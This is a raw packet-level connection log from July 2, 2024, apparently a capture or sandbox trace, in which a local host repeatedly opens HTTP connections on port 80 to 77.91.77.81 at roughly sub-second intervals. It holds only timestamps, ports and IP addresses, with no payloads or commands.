Jul 2, 2024 00:27:49.737989902 CEST	49917	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:49.738075972 CEST	80	49916	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:49.738122940 CEST	49916	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:49.738322020 CEST	49917	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:49.744158983 CEST	80	49917	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:50.457822084 CEST	80	49917	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:50.457895041 CEST	49917	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:50.572354078 CEST	49917	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:50.572681904 CEST	49918	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:50.577476978 CEST	80	49917	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:50.577532053 CEST	49917	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:50.577759027 CEST	80	49918	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:50.577816963 CEST	49918	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:50.578016043 CEST	49918	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:50.582818985 CEST	80	49918	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:51.274373055 CEST	80	49918	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:51.274485111 CEST	49918	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:51.278522015 CEST	49918	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:51.278527021 CEST	49919	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:51.285039902 CEST	80	49919	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:51.285485983 CEST	80	49918	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:51.285564899 CEST	49918	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:51.285567045 CEST	49919	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:51.286154032 CEST	49919	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:51.292944908 CEST	80	49919	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:51.987782955 CEST	80	49919	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:51.987849951 CEST	49919	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:52.103749037 CEST	49919	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:52.104130030 CEST	49920	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:52.110543966 CEST	80	49920	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:52.110559940 CEST	80	49919	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:52.110616922 CEST	49920	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:52.110625029 CEST	49919	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:52.110888958 CEST	49920	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:52.117482901 CEST	80	49920	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:52.827332020 CEST	80	49920	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:52.827457905 CEST	49920	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:52.830389023 CEST	49920	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:52.830389023 CEST	49921	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:52.837161064 CEST	80	49921	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:52.837236881 CEST	49921	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:52.837719917 CEST	49921	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:52.838177919 CEST	80	49920	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:52.838238001 CEST	49920	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:52.844974995 CEST	80	49921	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:53.564385891 CEST	80	49921	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:53.564507961 CEST	49921	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:53.681844950 CEST	49921	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:53.682295084 CEST	49922	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:53.689974070 CEST	80	49921	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:53.690007925 CEST	80	49922	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:53.690023899 CEST	49921	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:53.690068007 CEST	49922	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:53.690315962 CEST	49922	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:53.697319031 CEST	80	49922	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:54.398050070 CEST	80	49922	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:54.398108959 CEST	49922	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:54.401263952 CEST	49922	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:54.401671886 CEST	49923	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:54.408401966 CEST	80	49922	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:54.408457994 CEST	49922	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:54.408601046 CEST	80	49923	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:54.408664942 CEST	49923	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:54.408920050 CEST	49923	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:54.414344072 CEST	80	49923	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:55.101187944 CEST	80	49923	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:55.101440907 CEST	49923	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:55.218333006 CEST	49923	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:55.219038963 CEST	49924	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:55.225421906 CEST	80	49924	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:55.225608110 CEST	49924	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:55.225617886 CEST	80	49923	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:55.225755930 CEST	49923	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:55.226856947 CEST	49924	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:55.233483076 CEST	80	49924	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:55.962435007 CEST	80	49924	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:55.962501049 CEST	49924	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:55.966101885 CEST	49924	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:55.966654062 CEST	49925	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:55.973069906 CEST	80	49924	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:55.973093033 CEST	80	49925	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:55.973109961 CEST	49924	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:55.973159075 CEST	49925	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:55.973500967 CEST	49925	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:55.979876041 CEST	80	49925	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:56.691535950 CEST	80	49925	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:56.694977045 CEST	49925	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:56.805696011 CEST	49925	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:56.806866884 CEST	49926	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:56.812607050 CEST	80	49925	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:56.813339949 CEST	80	49926	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:56.814986944 CEST	49925	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:56.814986944 CEST	49926	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:56.815186977 CEST	49926	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:56.823632002 CEST	80	49926	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:57.509808064 CEST	80	49926	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:57.510963917 CEST	49926	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:57.514305115 CEST	49926	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:57.514631033 CEST	49927	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:57.519464016 CEST	80	49927	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:57.519793034 CEST	80	49926	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:57.519890070 CEST	49926	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:57.519915104 CEST	49927	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:57.520201921 CEST	49927	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:57.524935007 CEST	80	49927	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:58.211472988 CEST	80	49927	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:58.211530924 CEST	49927	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:58.322434902 CEST	49927	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:58.322783947 CEST	49928	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:58.327544928 CEST	80	49928	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:58.327641964 CEST	49928	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:58.327749014 CEST	80	49927	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:58.327819109 CEST	49927	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:58.328193903 CEST	49928	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:58.333034039 CEST	80	49928	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:59.051047087 CEST	80	49928	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:59.054990053 CEST	49928	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:59.058017969 CEST	49929	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:59.058022022 CEST	49928	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:59.064562082 CEST	80	49929	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:59.064723015 CEST	80	49928	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:59.064846039 CEST	49929	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:59.064857006 CEST	49928	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:59.065084934 CEST	49929	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:59.071743011 CEST	80	49929	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:59.805485010 CEST	80	49929	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:59.805542946 CEST	49929	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:59.915894985 CEST	49929	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:59.916271925 CEST	49930	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:59.921094894 CEST	80	49930	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:59.921142101 CEST	80	49929	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:59.921160936 CEST	49930	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:59.921191931 CEST	49929	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:59.921354055 CEST	49930	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:59.926114082 CEST	80	49930	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:00.611536980 CEST	80	49930	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:00.611596107 CEST	49930	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:00.615128040 CEST	49930	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:00.615605116 CEST	49931	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:00.620326042 CEST	80	49930	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:00.620374918 CEST	49930	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:00.620832920 CEST	80	49931	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:00.620894909 CEST	49931	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:00.621170998 CEST	49931	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:00.626415014 CEST	80	49931	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:01.349834919 CEST	80	49931	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:01.353929043 CEST	49931	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:01.462002039 CEST	49931	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:01.462352991 CEST	49932	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:01.467250109 CEST	80	49931	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:01.467267036 CEST	80	49932	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:01.467434883 CEST	49932	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:01.467434883 CEST	49931	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:01.467674017 CEST	49932	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:01.472531080 CEST	80	49932	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:02.184393883 CEST	80	49932	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:02.184462070 CEST	49932	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:02.190140009 CEST	49932	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:02.190501928 CEST	49933	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:02.195307016 CEST	80	49933	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:02.195353985 CEST	80	49932	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:02.195368052 CEST	49933	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:02.195405960 CEST	49932	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:02.195921898 CEST	49933	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:02.201014996 CEST	80	49933	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:02.931139946 CEST	80	49933	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:02.933279037 CEST	49933	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:03.102356911 CEST	49933	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:03.103005886 CEST	49934	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:03.110666037 CEST	80	49933	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:03.110680103 CEST	80	49934	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:03.112961054 CEST	49933	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:03.112962008 CEST	49934	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:03.190154076 CEST	49934	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:03.197026014 CEST	80	49934	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:03.819106102 CEST	80	49934	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:03.819171906 CEST	49934	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:03.823689938 CEST	49934	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:03.824052095 CEST	49935	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:03.831072092 CEST	80	49934	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:03.831130981 CEST	49934	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:03.831233978 CEST	80	49935	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:03.831301928 CEST	49935	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:03.831584930 CEST	49935	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:03.838655949 CEST	80	49935	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:04.523957968 CEST	80	49935	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:04.524020910 CEST	49935	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:04.639938116 CEST	49935	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:04.640466928 CEST	49936	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:04.647571087 CEST	80	49935	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:04.647624016 CEST	49935	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:04.647857904 CEST	80	49936	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:04.647927999 CEST	49936	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:04.648099899 CEST	49936	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:04.655774117 CEST	80	49936	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:05.334619999 CEST	80	49936	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:05.334785938 CEST	49936	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:05.338819027 CEST	49936	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:05.339092016 CEST	49937	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:05.346076012 CEST	80	49937	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:05.346316099 CEST	49937	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:05.346380949 CEST	80	49936	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:05.346487999 CEST	49936	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:05.346625090 CEST	49937	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:05.354660988 CEST	80	49937	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:06.068873882 CEST	80	49937	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:06.068936110 CEST	49937	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:06.186208010 CEST	49937	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:06.186580896 CEST	49938	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:06.191426039 CEST	80	49938	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:06.191497087 CEST	49938	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:06.191581011 CEST	80	49937	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:06.191627979 CEST	49937	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:06.192038059 CEST	49938	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:06.196815968 CEST	80	49938	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:06.877609968 CEST	80	49938	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:06.877784967 CEST	49938	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:06.880620003 CEST	49938	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:06.881668091 CEST	49939	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:06.885642052 CEST	80	49938	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:06.885761023 CEST	49938	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:06.886497974 CEST	80	49939	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:06.890322924 CEST	49939	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:06.891036034 CEST	49939	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:06.896056890 CEST	80	49939	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:07.664323092 CEST	80	49939	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:07.664537907 CEST	49939	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:07.775298119 CEST	49939	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:07.775713921 CEST	49940	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:07.792130947 CEST	49941	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:07.966202021 CEST	80	49940	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:07.966223955 CEST	80	49941	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:07.966264963 CEST	49940	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:07.966330051 CEST	49941	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:07.966694117 CEST	49941	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:07.966980934 CEST	80	49939	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:07.967030048 CEST	49939	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:07.971595049 CEST	80	49941	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:08.666335106 CEST	80	49941	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:08.666409016 CEST	49941	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:08.774653912 CEST	49941	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:08.778913021 CEST	49942	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:08.779881001 CEST	80	49941	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:08.782998085 CEST	49941	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:08.784106016 CEST	80	49942	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:08.785388947 CEST	49942	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:08.787683010 CEST	49942	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:08.792540073 CEST	80	49942	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:09.480278015 CEST	80	49942	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:09.483002901 CEST	49942	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:09.485821009 CEST	49943	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:09.485821962 CEST	49942	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:09.490619898 CEST	80	49943	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:09.490933895 CEST	80	49942	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:09.490964890 CEST	49943	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:09.491192102 CEST	49942	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:09.491286039 CEST	49943	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:09.496031046 CEST	80	49943	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:10.184458017 CEST	80	49943	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:10.184516907 CEST	49943	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:10.291083097 CEST	49943	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:10.291511059 CEST	49944	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:10.296405077 CEST	80	49944	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:10.296422958 CEST	80	49943	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:10.296469927 CEST	49944	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:10.296499968 CEST	49943	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:10.296734095 CEST	49944	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:10.301513910 CEST	80	49944	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:10.306920052 CEST	49944	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:10.310244083 CEST	49945	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:10.315133095 CEST	80	49945	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:10.315210104 CEST	49945	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:10.315372944 CEST	49945	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:10.320193052 CEST	80	49945	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:11.025753021 CEST	80	49945	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:11.029133081 CEST	49945	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:11.134047985 CEST	49945	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:11.137033939 CEST	49946	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:11.140979052 CEST	80	49945	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:11.141114950 CEST	49945	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:11.144042015 CEST	80	49946	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:11.144248962 CEST	49946	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:11.144476891 CEST	49946	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:11.151473045 CEST	80	49946	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:11.829224110 CEST	80	49946	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:11.829288006 CEST	49946	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:11.833067894 CEST	49946	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:11.833478928 CEST	49947	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:11.840276957 CEST	80	49946	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:11.840331078 CEST	49946	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:11.840527058 CEST	80	49947	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:11.840584040 CEST	49947	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:11.840811968 CEST	49947	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:11.847770929 CEST	80	49947	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:12.542534113 CEST	80	49947	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:12.542582989 CEST	49947	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:12.649641991 CEST	49947	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:12.649929047 CEST	49948	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:12.654728889 CEST	80	49948	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:12.654742002 CEST	80	49947	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:12.654812098 CEST	49947	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:12.654828072 CEST	49948	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:12.655019045 CEST	49948	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:12.659707069 CEST	80	49948	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:13.368403912 CEST	80	49948	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:13.368536949 CEST	49948	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:13.371176958 CEST	49948	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:13.371602058 CEST	49949	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:13.376245975 CEST	80	49948	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:13.376354933 CEST	49948	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:13.376388073 CEST	80	49949	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:13.376571894 CEST	49949	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:13.376751900 CEST	49949	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:13.381525040 CEST	80	49949	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:14.068620920 CEST	80	49949	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:14.068705082 CEST	49949	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:14.181703091 CEST	49949	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:14.182066917 CEST	49950	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:14.188429117 CEST	80	49949	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:14.188467979 CEST	80	49950	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:14.188528061 CEST	49949	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:14.188568115 CEST	49950	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:14.188781023 CEST	49950	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:14.195789099 CEST	80	49950	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:14.891541004 CEST	80	49950	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:14.895028114 CEST	49950	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:14.898161888 CEST	49950	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:14.898165941 CEST	49951	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:14.905142069 CEST	80	49951	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:14.905421019 CEST	80	49950	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:14.905509949 CEST	49950	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:14.905510902 CEST	49951	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:14.905757904 CEST	49951	80	192.168.2.4	77.91.77.81
